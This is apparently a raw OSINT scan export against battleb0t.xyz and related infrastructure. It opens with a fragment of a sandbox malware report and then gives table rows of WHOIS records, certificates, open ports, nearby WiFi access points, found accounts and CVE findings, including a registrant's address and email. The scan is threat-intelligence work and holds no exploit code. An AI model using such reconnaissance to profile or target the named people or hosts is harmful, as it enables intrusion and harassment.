"png"\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "RS-en-20191230-popsignuptwoweeks-perspective_alpha_website_large_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "la-solid-900_1_.eot" has type "Embedded OpenType (EOT) la-solid-900 family"- [targetUID: N/A]\n "free-fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "device-pile_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "line-awesome.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002944]\n "free.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "mobile_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced"- [targetUID: N/A]\n "free-fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Regular family"- [targetUID: N/A]\n "la-regular-400_1_.eot" has type "Embedded OpenType (EOT) la-regular-400 family"- [targetUID: N/A]\n "netflix-logo_1_.png" has type "PNG image data 800 x 454 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free-v4-shims.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "~DF4D4C34410C8CB14F.TMP" has type "data"- Location: 
| 185.199.108.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | E3 (Net ID: 00:00:72:20:5B:C1) | 37.7813933,-122.3918002 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | guventip (Net ID: 00:15:56:68:31:96) | 40.2024, 29.0398 |
| 2023-05-12 03:08:51 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.123 | 34.148.97.127 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 1 | 2 | 0 | None | 87.248.157.102:3306 | 87.248.157.102 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <hidden ssid> (Net ID: 00:01:E3:55:27:34) | 52.3759, 4.8975 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.172): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.149): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan7_1 (Net ID: 00:02:6F:04:08:D7) | 37.7642, -122.3993 |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c52e4b1988e1e3e-FRA
Content-Encoding: gzip
| 172.67.135.9 |
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 4 | 0 | 2 | 0 | None | https://battleb0t.xyz/main.built.js | https://battleb0t.xyz/ |
| 2023-05-12 02:54:18 | HTTP Headers | No | Web Spider | 6 | 0 | 2 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:18 GMT", "cf-ray": "7c5f6051f8c478df-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} | nwapi.battleb0t.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CATYLN (Net ID: 00:01:38:86:06:1F) | 37.7813933,-122.3918002 |
| 2023-05-12 02:46:03 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 32.8608, -79.9746 | 34.148.97.127 |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.234): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:41:28 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Netherlands | Eygelshoven, Limburg, LI, Netherlands, NL |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:01:24:F2:17:BC) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | G5 Base (Net ID: 00:02:2D:1B:5B:C9) | 37.7642, -122.3993 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ProCare-Guest (Net ID: 00:01:21:1C:31:00) | 37.7813933,-122.3918002 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f60498977c3f0-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"909ebccb4059d7a6690e6424fe1cd04d\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60498977c3f0-EWR"} |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | ImageShack (Category: images)
https://imageshack.com/user/ayshoo | ayshoo |
| 2023-05-12 03:00:10 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:10:b4:30:a3:e0:72:2f:ec:4e:bc:95:e3:12:bb:83:8d:6f
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Dec 14 04:12:32 2022 GMT
Not After : Mar 14 04:12:31 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:9F:0E:73:7B:4F:1D:9B:10:7F:DE:3A:BF:95:29:99:72:64:39:CE
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 14 05:12:32.135 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 05:12:32.070 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: ecdsa-with-SHA384
| ayhu.xyz |
| 2023-05-12 03:12:15 | Affiliate - Domain Whois | No | Whois | 5 | 0 | 6 | 0 | None | Domain Name: NETCRAFT.COM
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-12-07T10:43:50Z
Creation Date: 1994-10-18T04:00:00Z
Registry Expiry Date: 2026-10-17T04:00:00Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: AUTHNS1.NETCRAFT.COM
Name Server: AUTHNS2.NETCRAFT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain name: netcraft.com
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2020-09-21T12:40:37.88Z
Creation Date: 1994-10-18T04:00:00.00Z
Registrar Registration Expiration Date: 2026-10-17T04:00:00.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Name Server: authns1.netcraft.com
Name Server: authns2.netcraft.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:56:11.35Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | netcraft.com |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 55 2nd PMO (Net ID: 00:01:21:10:85:60) | 37.780462,-122.390564 |
| 2023-05-12 03:09:24 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 3 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | 64.226.81.43 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS (Net ID: 00:00:C5:D7:5E:40) | 41.8781, -87.6298 |
| 2023-05-12 03:11:42 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 3 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | panel.battleb0t.xyz |
| 2023-05-12 02:44:20 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.110.153 |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [eliaspinheironeto.github.io]
https://www.openphish.com/feed.txt | eliaspinheironeto.github.io |
| 2023-05-12 03:01:28 | Web Server | No | Tool - WhatWeb | 0 | 0 | 2 | 0 | None | cloudflare | nwapi.battleb0t.xyz |
| 2023-05-12 03:00:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.16): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:00 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.102): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Steam (Category: gaming)
https://steamcommunity.com/id/Altpapier | Altpapier |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | TOMTSSID (Net ID: 00:02:2D:76:6D:DF) | 50.1188, 8.6843 |
| 2023-05-12 03:32:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.7:8080 | 188.114.97.0/24 |
| 2023-05-12 02:44:06 | Domain Registrar | No | Whois | 0 | 0 | 1 | 0 | None | Registrar of domain names REG.RU LLC | battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WLAN (Net ID: 00:01:24:F1:42:27) | 52.3759, 4.8975 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:02:CF:59:0A:CB) | 40.2024, 29.0398 |
| 2023-05-12 02:54:22 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | http://panel.battleb0t.xyz | panel.battleb0t.xyz |
| 2023-05-12 02:55:15 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 14061 | 165.232.113.85 |
| 2023-05-12 03:09:32 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | cdn-185-199-109-154.github.com | 185.199.109.154 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom460A18 (Net ID: 00:0C:F6:46:0A:18) | 50.8897, 6.0563 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | akniga (Category: hobby)
https://akniga.org/profile/login | login |
| 2023-05-12 02:47:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.110.153:443 | 185.199.110.153 |
| 2023-05-12 03:31:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | abuse@porkbun.com | Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://porkbun.com
Updated Date: 2022-09-07T10:53:59Z
Creation Date: 2021-09-13T01:07:39Z
Registry Expiry Date: 2024-09-13T01:07:39Z
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: 5038508351
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: CURITIBA.NS.PORKBUN.COM
Name Server: FORTALEZA.NS.PORKBUN.COM
Name Server: MACEIO.NS.PORKBUN.COM
Name Server: SALVADOR.NS.PORKBUN.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:56Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://www.porkbun.com
Updated Date: 2022-01-28 17:32:18
Created Date: 2021-09-13 01:07:39
Registrar Registration Expiration Date: 2024-09-13 01:07:39
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: +1.5038508351
Domain Status: clientTransferProhibited http://icann.org/epp#clientTransferProhibited
Domain Status: clientDeleteProhibited http://icann.org/epp#clientDeleteProhibited
Registry Registrant ID:
Registrant Name: d3f c0n6
Registrant Organization: Boat Rolling Inc
Registrant Street: 10 Voie de l'Excelsior
Registrant City: Val-de-Reuil
Registrant State/Province: Normandy
Registrant Postal Code: 27100
Registrant Country: FR
Registrant Phone: +33:FR.268605683
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: d3fc0n6@protonmail.com
Registry Admin ID:
Admin Name: d3f c0n6
Admin Organization: Boat Rolling Inc
Admin Street: 10 Voie de l'Excelsior
Admin City: Val-de-Reuil
Admin State/Province: Normandy
Admin Postal Code: 27100
Admin Country: FR
Admin Phone: +33:FR.268605683
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: d3fc0n6@protonmail.com
Registry Tech ID:
Tech Name: d3f c0n6
Tech Organization: Boat Rolling Inc
Tech Street: 10 Voie de l'Excelsior
Tech City: Val-de-Reuil
Tech State/Province: Normandy
Tech Postal Code: 27100
Tech Country: FR
Tech Phone: +33:FR.268605683
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: d3fc0n6@protonmail.com
Name Server: curitiba.ns.porkbun.com
Name Server: fortaleza.ns.porkbun.com
Name Server: salvador.ns.porkbun.com
Name Server: maceio.ns.porkbun.com
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net
>>> Last update of WHOIS database: 2022-01-28 17:32:18 <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
|
| 2023-05-12 02:45:47 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Chantilly', u'security': {u'is_vpn': False}, u'city_geoname_id': 4751935, u'region_geoname_id': 6254928, u'country': u'United States', u'region': u'Virginia', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'FASTLY', u'isp_name': u'American Registry Internet Numbers', u'organization_name': u'American Registry Internet Numbers', u'autonomous_system_number': 54113}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'20151', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:46'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:50c0:8001::153', u'continent': u'North America', u'region_iso_code': u'VA'} | 2606:50c0:8001::153 |
| 2023-05-12 03:03:38 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00xkhaled.github.io |
| 2023-05-12 03:00:51 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.74): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WaveLAN Network (Net ID: 00:02:2D:03:8E:D3) | 37.780462,-122.390564 |
| 2023-05-12 03:31:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | abuse@godaddy.com | Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-09-16T17:34:41Z
Creation Date: 2014-07-15T10:59:40Z
Registry Expiry Date: 2023-07-15T10:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-07-16T08:59:21Z
Creation Date: 2014-07-15T05:59:40Z
Registrar Registration Expiration Date: 2023-07-15T05:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
